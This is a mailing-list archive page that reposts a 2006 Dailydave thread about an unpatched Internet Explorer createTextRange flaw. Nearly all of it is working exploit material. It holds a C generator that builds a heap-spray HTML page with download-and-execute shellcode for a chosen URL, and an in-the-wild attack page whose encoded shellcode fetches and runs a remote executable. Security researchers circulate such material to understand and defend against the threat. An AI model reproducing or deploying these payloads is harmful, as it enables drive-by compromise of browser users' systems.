Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] Ie attack code



> 
> Message: 1
> Date: Sat, 25 Mar 2006 17:50:18 +0100
> From: "Anthony Aykut" <anthony.aykut@xxxxxxxxxx>
> Subject: RE: [Dailydave] IE attack...
> To: <dailydave@xxxxxxxxxxxxxxxxxxxxx>
> Message-ID: <20060325165037.E1564D296A@xxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain;     charset="us-ascii"
> 
> And here is the C code ;)
> 
> _Anthony
> 
> /*
> *
> * Internet Explorer "createTextRang" Download Shellcoded Exploit
> * Bug discovered by Computer Terrorism (UK)
> * http://www.computerterrorism.com/research/ct22-03-2006
> * Reliable exploitation by Darkeagle of Unl0ck Research Team
> * http://www.milw0rm.com/exploits/1606
> *
> * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
> * Severity: Critical
> * Impact: Remote System Access
> * Solution Status: Unpatched
> *
> * E-Mail: atmaca@xxxxxxxxxxx
> * Web: http://www.spyinstructors.com,http://www.atmacasoft.com
> * Credit to Kozan,Darkeagle,delikon,Stelian Ene
> *
> */
> 
> #include <windows.h>
> #include <stdio.h>
> 
> #define BUF_LEN         0x1518
> #define FILE_NAME       "index.htm"
> 
> char body1[] =
> "<input type=\"checkbox\" id=\"blah\">\r\n"
> "<SCRIPT language=\"javascript\">\r\n\r\n"
> "shellcode = unescape(\r\n"
> "\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE
8EC\" +\r\n"
> "\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u5
0D0\" +\r\n"
> "\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0
877\" +\r\n"
> "\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u3
1D0\" +\r\n"
> "\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6
456\" +\r\n"
> "\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC
35D\" +\r\n"
> "\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u1
84A\" +\r\n"
> "\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u3
8AC\" +\r\n"
> "\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0
124\" +\r\n"
> "\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0
000\" +\r\n"
> "\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7
865\" +\r\n"
> "\t\"%u0065";
> 
> char body2[] =
>         "\r\n\r\nbigblock = unescape(\"%u9090%u9090\");\r\n"
>         "slackspace = 20 + shellcode.length\r\n\r\n"
>         "while (bigblock.length < slackspace)\r\n"
>         "\tbigblock += bigblock;\r\n\r\n"
>         "fillblock = bigblock.substring(0, slackspace);\r\n\r\n"
>         "block = bigblock.substring(0, 
> bigblock.length-slackspace);\r\n\r\n"
>         "while(block.length + slackspace < 0x40000)\r\n"
>         "\tblock = block + block + fillblock;\r\n\r\n"
>         "memory = new Array();\r\n\r\n"
>         "for ( i = 0; i < 2020; i++ )\r\n"
>         "\tmemory[i] = block + shellcode;\r\n\r\n"
>         "var r = 
> document.getElementById('blah').createTextRange();\r\n\r\n"
>         "</script>\r\n";
> 
> 
> int main(int argc,char *argv[])
> {
>         if (argc < 2)
>         {
>                 printf("\nInternet Explorer 
> \"createTextRang\" Download
> Shellcoded Exploit");
>                 printf("\nUsage:\n");
>                 printf(" ie_exp <WebUrl>\n");
> 
>                 return 0;
>         }
> 
>         FILE *File;
>         char *pszBuffer;
>         char *web = argv[1];
>         char *pu = "%u";
>         char u_t[5];
>         char *utf16 = (char*)malloc(strlen(web)*5);
> 
>         if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
>                 printf("\n [Err:] fopen()");
>                 exit(1);
>         }
> 
>         pszBuffer = (char*)malloc(BUF_LEN);
>         memcpy(pszBuffer,body1,sizeof(body1)-1);
> 
>         memset(utf16,'\0',strlen(web)*5);
>         for (unsigned int i=0;i<strlen(web);i=i+2)
>         {
>                 sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
>                 strcat(utf16,u_t);
>         }
> 
>         strcat(pszBuffer,utf16);
>         strcat(pszBuffer,"%u0000\");");
>         strcat(pszBuffer,body2);
> 
>         fwrite(pszBuffer, BUF_LEN, 1,File);
>         fclose(File);
> 
>         printf("\n\n"  FILE_NAME  " has been created in the current
> directory.\n");
>         return 1;
> }
> 
> 
> 
> -----Original Message-----
> From: Dave Aitel [mailto:dave@xxxxxxxxxxxxxxx] 
> Sent: 25 March 2006 17:41
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Subject: [Dailydave] IE attack...
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>  
> So this is the IE attack various sites are owning people 
> with...I stumbled
> on it while browsing random things. It's been a pretty bad 
> week for IE this
> week. Of course, it's been a pretty bad year for IE.
> Been a pretty bad time all around for IE. Motto: "Giving Host 
> Intrusion
> Prevention vendors case study after case study."
> 
> I don't know why the other lists aren't posting this. Maybe 
> there was a memo
> that went around where you try to keep people from knowing 
> what they're
> actually at risk from.
> 
> - -dave
> 
> <input type="checkbox" id="blah">
> <SCRIPT language="java script">
> 
> shellcode = unescape(
>  
> "%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u6300%u6c61%u2
> e63%u7865%u0065%u6f4d%u697a%u6c6c%u2f61%u2e34%u2030%u6328%u6d6
f%u6170%u6974%
> u6c62%u3b65%u4d20%u4953%u2045%u2e35%u3130%u203b%u6957%u646e%u7
76f%u2073%u544
> e%u3520%u302e%u0029%u6977%u696e%u656e%u2e74%u6c64%u006c%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e6
5%u0041%u6e49%
> u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u4900%u746e%u7265%u6
56e%u5274%u616
> 5%u4664%u6c69%u0065%u6e49%u6574%u6e72%u7465%u6c43%u736f%u4865%
> u6e61%u6c64%u0
> 065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%
> u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u0000%u0000%u0000%u7468%u7074%u2f3a%u772f%u7777%u662
e%u6c75%u666c%
> u7461%u6b73%u6e69%u796e%u632e%u6d6f%u632f%u2e61%u7865%u0065%u0
000%u0000%u000
> 0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
> u0000%u0000%u0
> 000%u0000%u6058%ud08b%u33fc%u64c0%u408b%u8b30%u0c40%u708b%uad1
c%u688b%u5208%
> u5252%u5252%u5252%u5252%u5252%u5252%u79bb%ue741%u5288%u0068%u0
002%ue800%u019
> 1%u0000%u8b5f%u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000%ua4f2%
> ubb5a%u7959%u4
> 773%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6800%u0000%u4000%ue85
2%u0161%u0000%
> ue85a%u014b%u0000%u4289%u8304%u0cea%u71bb%ue8a7%u52fe%u4ae8%u0
001%ubb00%uc21
> b%u3b10%ue85a%u012f%u0000%u0289%uc283%u5210%ue850%u0133%u0000%
> u815a%ue8c2%u0
> 003%u8300%u09c2%u006a%u006a%u006a%u006a%uff52%u5ad0%u08e8%u000
1%u8900%u0842%
> u028b%u1bbb%u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00%ueee8%u0
000%u8b00%u8bd
> 8%u0842%uc281%u00a8%u0000%u006a%u0068%u0000%u6a80%u6a00%u5200%
> uff50%u5ad3%uc
> ee8%u0000%u8900%u0842%u028b%u1bbb%u10c2%u833b%u2fc2%u5052%ucae
8%u0000%u8b00%
> u5af0%ub2e8%u0000%u8b00%u087a%uca8b%uc183%u5a0c%u5256%u5151%ue
868%u0003%u520
> 0%uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02%u5a2a%u5251%ue852%
> u0087%u0000%ud
> a8b%uc383%u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056%u4fbb%u6a4
7%ue807%u007b%
> u0000%u595a%ueb5e%u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776%ue
d00%ue850%u006
> 1%u0000%ubb5a%u4179%u88e7%u6852%u0200%u0000%u50e8%u0000%u5f00%
> uf78b%uf803%uc
> 681%u03e8%u0000%u09b9%u0000%uf200%u5aa4%uc033%uf28b%uc681%u049
1%u0000%ufe8b%
> uc783%uc710%u1047%u0044%u0000%u21bb%u05d0%u57d0%u5056%u6a50%u5
020%u5050%u525
> 0%u12e8%u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2%uc283%u8334%
> u0cc2%u53c3%u5
> 756%u458b%u8b3c%u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0%u41c
9%u348b%u038a%
> u33f5%uc1ff%u13cf%u03ac%u85f8%u75c0%u3bf6%u75fb%u5aea%u5a8b%u0
324%u66dd%u0c8
> b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5%u5b5e%ue0ff");
> 
>     bigblock = unescape("%u9090%u9090");
>     slackspace = 20 + shellcode.length
> 
>     while (bigblock.length < slackspace)
>         bigblock += bigblock;
> 
>     fillblock = bigblock.substring(0, slackspace);
> 
>     block = bigblock.substring(0, bigblock.length-slackspace);
> 
>     while(block.length + slackspace < 0x40000)
>         block = block + block + fillblock;
> 
>     memory = new Array();
> 
>     for ( i = 0; i < 2020; i++ )
>         memory[i] = block + shellcode;
> 
>     var r = document.getElementById('blah').createTextRange();
> 
> </script>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.2 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>  
> iD8DBQFEJXKktehAhL0gheoRApFMAJkBqhCnj2NTvVZ30sJUhhk/2gwkpgCcChNa
> CNw1qWJPIKuPDBFaPZDW47U=
> =+Vsq
> -----END PGP SIGNATURE-----
> 
> 
> 
> 
> 
> 



 




Copyright © Lexa Software, 1996-2009.